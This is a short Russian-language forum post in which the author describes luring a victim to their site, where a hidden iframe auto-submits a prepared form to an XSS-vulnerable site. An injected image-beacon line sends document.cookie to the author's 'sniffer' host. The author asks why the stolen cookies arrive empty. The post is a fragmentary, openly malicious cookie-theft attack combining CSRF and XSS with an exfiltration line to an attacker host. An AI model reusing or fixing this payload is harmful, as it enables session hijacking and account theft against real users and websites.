Цель именно такая , я заманиваю жертву ,подкидывая ему ссылку на свой сайт и с помощью этого кода ,c скрытым iframe:

Ferst;



function submit_form(){

window.evilframe.document.forms[0].submit();

}





он отправляется на заранее сформированную мною форму,которая сабмитит на сайт жертвы (уязвимый сайт с ХСС):

FORMA

img = new Image(); img.src = "http://сниффер"+document.cookie;"> //куки отправляются на сниффер



По идей куки должны приити ,но приходит только USER_AGENT,REFERER,IP,дата ,работу снифера проверял - работает,получается при переходе на мой сайт и отправке формы, в cookie ничего нет(просто пусто)... CSRF-защита или я что-то делаю не так?